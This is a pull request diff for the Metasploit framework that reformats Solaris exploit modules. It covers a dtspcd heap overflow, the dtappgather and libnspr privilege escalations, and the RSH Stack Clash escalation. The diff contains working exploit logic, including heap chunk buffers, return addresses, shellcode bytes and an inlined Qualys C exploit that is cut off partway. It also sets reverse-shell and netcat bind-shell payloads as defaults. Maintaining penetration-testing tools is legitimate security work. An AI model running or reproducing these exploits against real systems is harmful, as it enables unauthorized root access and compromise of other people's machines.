### PR TITLE
modules/exploits/solaris: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/solaris/dtspcd/heap_noir.rb
+++ b/modules/exploits/solaris/dtspcd/heap_noir.rb
@@ -7,71 +7,80 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris dtspcd Heap Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris dtspcd Heap Overflow',
+        'Description' => %q{
           This is a port of noir's dtspcd exploit. This module should
-        work against any vulnerable version of Solaris 8 (sparc).
-        The original exploit code was published in the book
-        Shellcoder's Handbook.
-      },
-      'Author'         => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2001-0803'],
-          [ 'OSVDB', '4503'],
-          [ 'BID', '3517'],
-          [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
-          [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
+          work against any vulnerable version of Solaris 8 (sparc).
+          The original exploit code was published in the book
+          Shellcoder's Handbook.
+        },
+        'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2001-0803'],
+          ['OSVDB', '4503'],
+          ['BID', '3517'],
+          ['URL', 'https://web.archive.org/web/20011116020106/http://www.cert.org/advisories/CA-2001-31.html'],
+          ['URL', 'https://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
 
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 800,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 800,
           'BadChars' => "\x00\x0d",
-          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
+          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3)
         },
-      'Platform'       => 'solaris',
-      'Arch'           => ARCH_SPARC,
-      'Targets'        =>
-        [
-          ['Solaris 8',
-            { 'Rets' =>
-              [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
+        'Platform' => 'solaris',
+        'Arch' => ARCH_SPARC,
+        'Targets' => [
+          [
+            'Solaris 8',
+            {
+              'Rets' => [
+                0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ]
+              ]
             }
           ],
         ],
-      'DisclosureDate' => '2002-07-10',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2002-07-10',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_RESTARTS ]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(6112)
-      ])
+    register_options([
+      Opt::RPORT(6112)
+    ])
   end
 
-
   def exploit
-    return if not dtspcd_uname()
-
     target['Rets'][4].each do |tjmp|
-
       rbase = target['Rets'][1]
 
-      while (rbase < target['Rets'][2]) do
+      while (rbase < target['Rets'][2])
         break if session_created?
+
+        retloc = target['Rets'][0] + tjmp
+        print_status(format('Trying 0x%<retloc>.8x 0x%<rbase>.8x...', retloc: retloc, rbase: rbase))
+
         begin
-          print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
-          attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
+          attack(retloc, rbase, payload.encoded)
           break if session_created?
 
-          attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
+          attack(retloc, rbase + 4, payload.encoded)
           rbase += target['Rets'][3]
         rescue EOFError
+          # This is expected
         end
       end
     end
@@ -81,65 +90,63 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return Exploit::CheckCode::Detected if dtspcd_uname()
-    return Exploit::CheckCode::Safe
-  end
-
-  def dtspcd_uname
-    spc_connect()
+    spc_connect
     spc_write(spc_register('root', "\x00"), 4)
-    host, os, ver, arch = spc_read().gsub("\x00", '').split(':')
+    host, os, ver, arch = spc_read.gsub("\x00", '').split(':')
 
-    return false if not host
+    return CheckCode::Safe unless host
 
-    print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
-    spc_write("", 2)
-    return true
+    spc_write('', 2)
+
+    return CheckCode::Safe("Detected dtspcd running #{os} v#{ver} on #{arch} hardware. Target host architecture #{arch} is not sparc.") unless arch =~ /sparc/i
+
+    CheckCode::Detected("Detected dtspcd running #{os} v#{ver} on #{arch} hardware.")
   end
-
 
   def chunk_create(retloc, retadd)
     "\x12\x12\x12\x12" +
-    [retadd].pack('N')+
-    "\x23\x23\x23\x23\xff\xff\xff\xff" +
-    "\x34\x34\x34\x34\x45\x45\x45\x45" +
-    "\x56\x56\x56\x56" +
-    [retloc - 8].pack('N')
+      [retadd].pack('N') +
+      "\x23\x23\x23\x23\xff\xff\xff\xff" \
+      "\x34\x34\x34\x34\x45\x45\x45\x45" \
+      "\x56\x56\x56\x56" +
+      [retloc - 8].pack('N')
   end
-
 
   def attack(retloc, retadd, fcode)
-    spc_connect()
+    spc_connect
 
-    begin
-      buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
-      buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
-      buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
-      buf << "\x00\x00\x0f\xf4"
-      buf << chunk_create(retloc, retadd)
-      buf << "X" * ((0x103e - 8) - buf.length)
+    buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8))
+    buf << fcode
+    buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
+    buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
+    buf << "\x00\x00\x0f\xf4"
+    buf << chunk_create(retloc, retadd)
+    buf << 'X' * ((0x103e - 8) - buf.length)
 
-      spc_write(spc_register("", buf), 4)
+    spc_write(spc_register('', buf), 4)
 
-      handler
-
-    rescue EOFError
-    end
+    handler
+  rescue EOFError
+    # This is expected
   end
 
-
-  def spc_register(user='', buff='')
+  def spc_register(user = '', buff = '')
     "4 \x00#{user}\x00\x0010\x00#{buff}"
   end
 
-  def spc_write(buff = '', cmd='')
-    sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
+  def spc_write(buff = '', cmd = '')
+    data = format('%08x', 2)
+    data << format('%02x', cmd)
+    data << format('%04x', buff.length)
+    data << format('%04x', (@spc_seq += 1))
+    data << "  #{buff}"
+    sock.put(data)
   end
 
   def spc_read
     # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
     head = sock.get_once(20)
-    sock.get_once( head[10, 13].hex ) || ''
+    sock.get_once(head[10, 13].hex) || ''
   end
 
   def spc_connect

--- a/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb
+++ b/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb
@@ -15,64 +15,66 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
-      'Description'    => %q{
-        This module exploits a directory traversal vulnerability in the
-        `dtappgather` executable included with Common Desktop Environment (CDE)
-        on unpatched Solaris systems prior to Solaris 10u11 which allows users
-        to gain root privileges.
+    super(
+      update_info(
+        info,
+        'Name' => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
+        'Description' => %q{
+          This module exploits a directory traversal vulnerability in the
+          `dtappgather` executable included with Common Desktop Environment (CDE)
+          on unpatched Solaris systems prior to Solaris 10u11 which allows users
+          to gain root privileges.
 
-        dtappgather allows users to create a user-owned directory at any
-        location on the filesystem using the `DTUSERSESSION` environment
-        variable.
+          dtappgather allows users to create a user-owned directory at any
+          location on the filesystem using the `DTUSERSESSION` environment
+          variable.
 
-        This module creates a directory in `/usr/lib/locale`, writes a shared
-        object to the directory, and runs the specified SUID binary with the
-        shared object loaded using the `LC_TIME` environment variable.
+          This module creates a directory in `/usr/lib/locale`, writes a shared
+          object to the directory, and runs the specified SUID binary with the
+          shared object loaded using the `LC_TIME` environment variable.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        Solaris 9u7 (09/04) (x86);
-        Solaris 10u1 (01/06) (x86);
-        Solaris 10u2 (06/06) (x86);
-        Solaris 10u4 (08/07) (x86);
-        Solaris 10u8 (10/09) (x86);
-        Solaris 10u9 (09/10) (x86).
-      },
-      'References'     =>
-        [
+          Solaris 9u7 (09/04) (x86);
+          Solaris 10u1 (01/06) (x86);
+          Solaris 10u2 (06/06) (x86);
+          Solaris 10u4 (08/07) (x86);
+          Solaris 10u8 (10/09) (x86);
+          Solaris 10u9 (09/10) (x86).
+        },
+        'References' => [
           ['BID', '97774'],
           ['CVE', '2017-3622'],
           ['EDB', '41871'],
           ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],
           ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']
         ],
-      'Notes'          => {
-        'Stability' => [CRASH_SAFE],
-        'SideEffects' => [],
-        'Reliability' => [],
-        'AKA' => ['EXTREMEPARR'] },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Shadow Brokers',   # exploit
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => [],
+          'AKA' => ['EXTREMEPARR']
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Shadow Brokers', # exploit
           'Hacker Fantastic', # dtappgather-poc.sh
-          'bcoles'     # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2017-04-24',
-      'Privileged'     => true,
-      'Platform'       => ['solaris', 'unix'],
-      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
-      'Targets'        => [['Auto', {}]],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'DefaultOptions' =>
-        {
-          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
-          'WfsDelay'    => 10,
+        'DisclosureDate' => '2017-04-24',
+        'Privileged' => true,
+        'Platform' => ['solaris', 'unix'],
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
+        'Targets' => [['Auto', {}]],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
+          'WfsDelay' => 10,
           'PrependFork' => true
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_options [
       # Some useful example SUID executables:
       # * /usr/bin/at
@@ -183,9 +185,9 @@ class MetasploitModule < Msf::Exploit::Local
     new_dir = "#{locale_path}/#{locale_name}"
     vprint_status "Creating directory #{new_dir}"
     depth = 3
-    cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"
+    cmd_exec 'DTUSERSESSION=. /usr/dt/bin/dtappgather'
     depth.times do
-      cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"
+      cmd_exec 'DTUSERSESSION=.. /usr/dt/bin/dtappgather'
     end
     symlink locale_path, appmanager_path
     cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"

--- a/modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb
+++ b/modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb
@@ -15,27 +15,28 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
-      'Description'    => %q{
-        This module exploits an arbitrary file write vulnerability in the
-        Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
-        prior to Solaris 10u3 which allows users to gain root privileges.
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
+        'Description' => %q{
+          This module exploits an arbitrary file write vulnerability in the
+          Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
+          prior to Solaris 10u3 which allows users to gain root privileges.
 
-        libnspr versions prior to 4.6.3 allow users to specify a log file with
-        the `NSPR_LOG_FILE` environment variable. The log file is created with
-        the privileges of the running process, resulting in privilege escalation
-        when used in combination with a SUID executable.
+          libnspr versions prior to 4.6.3 allow users to specify a log file with
+          the `NSPR_LOG_FILE` environment variable. The log file is created with
+          the privileges of the running process, resulting in privilege escalation
+          when used in combination with a SUID executable.
 
-        This module writes a shared object to the trusted library directory
-        `/usr/lib/secure` and runs the specified SUID binary with the shared
-        object loaded using the `LD_LIBRARY_PATH` environment variable.
+          This module writes a shared object to the trusted library directory
+          `/usr/lib/secure` and runs the specified SUID binary with the shared
+          object loaded using the `LD_LIBRARY_PATH` environment variable.
 
-        This module has been tested successfully with libnspr version 4.5.1
-        on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
-      },
-      'References'     =>
-        [
+          This module has been tested successfully with libnspr version 4.5.1
+          on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
+        },
+        'References' => [
           ['BID', '20471'],
           ['CVE', '2006-4842'],
           ['EDB', '2543'],
@@ -47,26 +48,31 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
           ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
         ],
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'iDefense',     # Discovery
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'iDefense', # Discovery
           'Marco Ivaldi', # Exploit
           'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2006-10-11',
-      'Privileged'     => true,
-      'Platform'       => ['solaris'],
-      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
-      'Targets'        => [['Auto', {}]],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'DefaultOptions' =>
-        {
-          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
-          'WfsDelay'    => 10,
+        'DisclosureDate' => '2006-10-11',
+        'Privileged' => true,
+        'Platform' => ['solaris'],
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
+        'Targets' => [['Auto', {}]],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
+          'WfsDelay' => 10,
           'PrependFork' => true
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
     register_options [
       # Some useful example SUID executables:
       # * /usr/bin/cancel
@@ -132,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Local
     # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
     # Earlier versions may also be vulnerable
     libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'
-    libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d\.]+),/).flatten.first
+    libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d.]+),/).flatten.first
     if libnspr_pkg_version.to_s.eql? ''
       vprint_error 'Could not determine libnspr version'
       return CheckCode::Unknown
@@ -170,12 +176,12 @@ class MetasploitModule < Msf::Exploit::Local
       119211, # Solaris 9  (SPARC) patch 119211-10
       119209  # Solaris 8  (SPARC) patch 119209-10
     ].each do |patch|
-      if installed_patches =~ / #{patch}-(\d+)/
-        revision = $1.to_i
-        if revision >= 10
-          vprint_error "Solaris patch #{patch}-#{revision} has been applied"
-          return CheckCode::Safe
-        end
+      next unless installed_patches =~ / #{patch}-(\d+)/
+
+      revision = ::Regexp.last_match(1).to_i
+      if revision >= 10
+        vprint_error "Solaris patch #{patch}-#{revision} has been applied"
+        return CheckCode::Safe
       end
     end
     vprint_good 'Solaris patches are not installed'

--- a/modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb
+++ b/modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb
@@ -15,33 +15,34 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris RSH Stack Clash Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a vulnerability in RSH on unpatched Solaris
-        systems which allows users to gain root privileges.
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris RSH Stack Clash Privilege Escalation',
+        'Description' => %q{
+          This module exploits a vulnerability in RSH on unpatched Solaris
+          systems which allows users to gain root privileges.
 
-        The stack guard page on unpatched Solaris systems is of
-        insufficient size to prevent collisions between the stack
-        and heap memory, aka Stack Clash.
+          The stack guard page on unpatched Solaris systems is of
+          insufficient size to prevent collisions between the stack
+          and heap memory, aka Stack Clash.
 
-        This module uploads and executes Qualys' Solaris_rsh.c exploit,
-        which exploits a vulnerability in RSH to bypass the stack guard
-        page to write to the stack and create a SUID root shell.
+          This module uploads and executes Qualys' Solaris_rsh.c exploit,
+          which exploits a vulnerability in RSH to bypass the stack guard
+          page to write to the stack and create a SUID root shell.
 
-        This module has offsets for Solaris versions 11.1 (x86) and
-        Solaris 11.3 (x86).
+          This module has offsets for Solaris versions 11.1 (x86) and
+          Solaris 11.3 (x86).
 
-        Exploitation will usually complete within a few minutes using
-        the default number of worker threads (10). Occasionally,
-        exploitation will fail. If the target system is vulnerable,
-        usually re-running the exploit will be successful.
+          Exploitation will usually complete within a few minutes using
+          the default number of worker threads (10). Occasionally,
+          exploitation will fail. If the target system is vulnerable,
+          usually re-running the exploit will be successful.
 
-        This module has been tested successfully on Solaris 11.1 (x86)
-        and Solaris 11.3 (x86).
-      },
-      'References'     =>
-        [
+          This module has been tested successfully on Solaris 11.1 (x86)
+          and Solaris 11.3 (x86).
+        },
+        'References' => [
           ['BID', '99151'],
           ['BID', '99153'],
           ['CVE', '2017-1000364'],
@@ -49,118 +50,461 @@ class MetasploitModule < Msf::Exploit::Local
           ['CVE', '2017-3630'],
           ['CVE', '2017-3631'],
           ['EDB', '42270'],
-          ['URL', 'http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html'],
+          ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2017-3629.html'],
           ['URL', 'https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash'],
-          ['URL', 'https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt']
+          ['URL', 'https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt'],
+          ['URL', 'https://www.qualys.com/2017/06/19/stack-clash/solaris_rsh.c'],
         ],
-      'Notes'          => { 'AKA' => ['Stack Clash', 'Solaris_rsh.c'] },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Qualys Corporation', # Stack Clash technique and Solaris_rsh.c exploit
-          'bcoles'       # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2017-06-19',
-      'Privileged'     => true,
-      'Platform'       => ['unix'],
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'Targets'        =>
-        [
+        'DisclosureDate' => '2017-06-19',
+        'Privileged' => true,
+        'Platform' => %w[unix solaris],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [
           ['Automatic', {}],
           ['Solaris 11.1', {}],
           ['Solaris 11.3', {}]
         ],
-      'DefaultOptions' =>
-        {
-          'PAYLOAD'     => 'cmd/unix/bind_netcat',
-          'WfsDelay'    => 10,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/bind_netcat',
+          'WfsDelay' => 10,
           'PrependFork' => true
         },
-      'DefaultTarget'  => 0))
-    register_options [
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Stack Clash', 'Solaris_rsh.c'],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        }
+      )
+    )
+    register_options([
       OptInt.new('WORKERS', [true, 'Number of workers', '10']),
       OptString.new('RSH_PATH', [true, 'Path to rsh executable', '/usr/bin/rsh'])
-    ]
-    register_advanced_options [
+    ])
+    register_advanced_options([
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
-    ]
+    ])
   end
 
   def rsh_path
     datastore['RSH_PATH']
   end
 
-  def mkdir(path)
-    vprint_status "Creating '#{path}' directory"
-    cmd_exec "mkdir -p #{path}"
-    register_dir_for_cleanup path
+  def root_shell
+    'ROOT'
   end
 
   def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
+    print_status("Writing '#{path}' (#{data.size} bytes) ...")
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
   end
 
   def upload_and_compile(path, data)
-    upload "#{path}.c", data
+    upload("#{path}.c", data)
 
-    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c"
+    output = cmd_exec("PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c")
     unless output.blank?
-      print_error output
-      fail_with Failure::Unknown, "#{path}.c failed to compile"
+      print_error(output)
+      fail_with(Failure::Unknown, "#{path}.c failed to compile")
     end
 
     register_file_for_cleanup path
   end
 
   def symlink(link_target, link_name)
-    print_status "Symlinking #{link_target} to #{link_name}"
-    rm_f link_name
-    cmd_exec "ln -sf #{link_target} #{link_name}"
-    register_file_for_cleanup link_name
+    print_status("Symlinking #{link_target} to #{link_name}")
+    rm_f(link_name)
+    cmd_exec("ln -sf #{link_target} #{link_name}")
+    register_file_for_cleanup(link_name)
   end
 
   def check
-    unless setuid? rsh_path
-      vprint_error "#{rsh_path} is not setuid"
-      return CheckCode::Safe
+    unless setuid?(rsh_path)
+      return CheckCode::Safe("#{rsh_path} is not setuid")
     end
-    vprint_good "#{rsh_path} is setuid"
+
+    vprint_good("#{rsh_path} is setuid")
 
     unless has_gcc?
-      vprint_error 'gcc is not installed'
-      return CheckCode::Safe
+      return CheckCode::Safe('gcc is not installed')
     end
-    vprint_good 'gcc is installed'
+
+    vprint_good('gcc is installed')
 
     version = kernel_version
-    if version.to_s.eql? ''
-      vprint_error 'Could not determine Solaris version'
-      return CheckCode::Detected
+    if version.to_s.eql?('')
+      return CheckCode::Detected('Could not determine Solaris version')
     end
 
     unless ['11.1', '11.3'].include? version
-      vprint_error "Solaris version #{version} is not vulnerable"
-      return CheckCode::Safe
+      return CheckCode::Safe("Solaris version #{version} is not vulnerable")
     end
-    vprint_good "Solaris version #{version} appears to be vulnerable"
 
-    CheckCode::Detected
+    CheckCode::Detected("Solaris version #{version} appears to be vulnerable")
+  end
+
+  def solaris_rsh_exploit
+    # Solaris_rsh.c by Qualys
+    # modified for Metasploit
+    workers = datastore['WORKERS'].to_i
+    shellcode = '\x31\xc0\x50\x68'
+    shellcode << root_shell
+    shellcode << '\x89\xe3\x50\x53\x89\xe2\x50\x50'
+    shellcode << '\x52\x53\xb0\x3C\x48\x50\xcd\x91'
+    shellcode << '\x31\xc0\x40\x50\x50\xcd\x91Z'
+    exp = <<~EOF
+      /*
+       * Solaris_rsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631
+       * Copyright (C) 2017 Qualys, Inc.
+       *
+       * This program is free software: you can redistribute it and/or modify
+       * it under the terms of the GNU General Public License as published by
+       * the Free Software Foundation, either version 3 of the License, or
+       * (at your option) any later version.
+       *
+       * This program is distributed in the hope that it will be useful,
+       * but WITHOUT ANY WARRANTY; without even the implied warranty of
+       * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+       * GNU General Public License for more details.
+       *
+       * You should have received a copy of the GNU General Public License
+       * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+       */
+
+      #include <errno.h>
+      #include <fcntl.h>
+      #include <signal.h>
+      #include <stdint.h>
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <string.h>
+      #include <sys/fcntl.h>
+      #include <sys/resource.h>
+      #include <sys/stat.h>
+      #include <sys/time.h>
+      #include <sys/types.h>
+      #include <sys/wait.h>
+      #include <unistd.h>
+
+      #ifndef timersub
+      #define timersub(a, b, result) \\
+          do { \\
+              (result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \\
+              (result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \\
+              if ((result)->tv_usec < 0) { \\
+                  --(result)->tv_sec; \\
+                  (result)->tv_usec += 1000000; \\
+              } \\
+          } while (0)
+      #endif
+
+      #define RSH "#{rsh_path}"
+      static const struct target * target;
+      static const struct target {
+          const char * name;
+          size_t s_first, s_last, s_step;
+          size_t l_first, l_last, l_step;
+          size_t p_first, p_last, p_step;
+          size_t a, b;
+          size_t i, j;
+      }
+      targets[] = {
+          {
+              .name = "Oracle Solaris 11.1 X86 (Assembled 19 September 2012)",
+              .s_first = 16*1024, .s_last = 44*1024, .s_step = 4096,
+              .l_first = 192,     .l_last = 512,     .l_step = 16,
+              .p_first = 0,       .p_last = 8192,    .p_step = 1,
+              .a = 0,             .b = 15,           .j = 12,
+              .i = 0x08052608 /* pop edx; pop ebp; ret */
+          },
+          {
+              .name = "Oracle Solaris 11.3 X86 (Assembled 06 October 2015)",
+              .s_first = 12*1024, .s_last = 44*1024, .s_step = 4096,
+              .l_first = 96,      .l_last = 512,     .l_step = 4,
+              .p_first = 0,       .p_last = 4096,    .p_step = 4,
+              .a = 0,             .b = 3,            .j = SIZE_MAX,
+              .i = 0x07faa7ea /* call *0xc(%ebp) */
+          },
+      };
+
+      #define ROOTSHELL "#{root_shell}"
+      static const char shellcode[] = "#{shellcode}";
+
+      static volatile sig_atomic_t sigalarm;
+
+      static void
+      sigalarm_handler(const int signum __attribute__((__unused__)))
+      {
+          sigalarm = 1;
+      }
+
+      #define die() do { \\
+          fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \\
+          exit(EXIT_FAILURE); \\
+      } while (0)
+
+      static int
+      is_suid_root(const char * const file)
+      {
+          if (!file) die();
+          static struct stat sbuf;
+          if (stat(file, &sbuf)) die();
+          if (!S_ISREG(sbuf.st_mode)) die();
+          return ((sbuf.st_uid == 0) && (sbuf.st_mode & S_ISUID));
+      }
+
+      static const char *
+      build_lca(const size_t l)
+      {
+          static const size_t shellcode_len = sizeof(shellcode)-1;
+          if (shellcode_len > 64) die();
+          if (shellcode_len % 16) die();
+          if (l < shellcode_len + target->a + target->b) die();
+
+          #define LCA_MAX 4096
+          if (l > LCA_MAX) die();
+          static char lca[128 + LCA_MAX];
+          strcpy(lca, "LC_ALL=");
+          char * cp = memchr(lca, '\\0', sizeof(lca));
+          if (!cp) die();
+          memcpy(cp, shellcode, shellcode_len);
+          cp += shellcode_len;
+          memset(cp, 'a', target->a);
+
+          size_t o;
+          for (o = target->a; l - o >= 4; o += 4) {
+              if ((o - target->a) % 16 == target->j) {
+                  cp[o + 0] = '\\xeb';
+                  cp[o + 1] = (o - target->a >= 16) ? -(16u + 2u) :
+                      -(shellcode_len + target->a + target->j + 2);
+                  cp[o + 2] = 'j';
+                  cp[o + 3] = 'j';
+              } else {
+                  if (sizeof(size_t) != 4) die();
+                  *(size_t *)(cp + o) = target->i;
+              }
+          }
+          cp += o;
+          memset(cp, 'b', target->b);
+          cp[target->b] = '\\0';
+          if (strlen(lca) != 7 + shellcode_len + o + target->b) die();
+          return lca;
+      }
+
+      static const char *
+      build_pad(const size_t p)
+      {
+          #define PAD_MAX 8192
+          if (p > PAD_MAX) die();
+          static char pad[64 + PAD_MAX];
+          strcpy(pad, "P=");
+          char * const cp = memchr(pad, '\\0', sizeof(pad));
+          if (!cp) die();
+          memset(cp, 'p', p);
+          cp[p] = '\\0';
+          if (strlen(pad) != 2 + p) die();
+          return pad;
+      }
+
+      static void
+      fork_worker(const size_t s, const char * const lca, const char * const pad)
+      {
+          #define N_WORKERS #{workers.to_i}
+          static size_t n_workers;
+          static struct {
+              pid_t pid;
+              struct timeval start;
+          } workers[N_WORKERS];
+
+          size_t i_worker;
+          struct timeval start, stop, diff;
+
+          if (n_workers >= N_WORKERS) {
+              if (n_workers != N_WORKERS) die();
+              int is_suid_rootshell = 0;
+              for (;;) {
+                  sigalarm = 0;
+                  #define TIMEOUT 10
+                  alarm(TIMEOUT);
+                  int status = 0;
+                  const pid_t pid = waitpid(-1, &status, WUNTRACED);
+                  alarm(0);
+                  if (gettimeofday(&stop, NULL)) die();
+
+                  if (pid <= 0) {
+                      if (pid != -1) die();
+                      if (errno != EINTR) die();
+                      if (sigalarm != 1) die();
+                  }
+                  int found_pid = 0;
+                  for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
+                      const pid_t worker_pid = workers[i_worker].pid;
+                      if (worker_pid <= 0) die();
+                      if (worker_pid == pid) {
+                          if (found_pid) die();
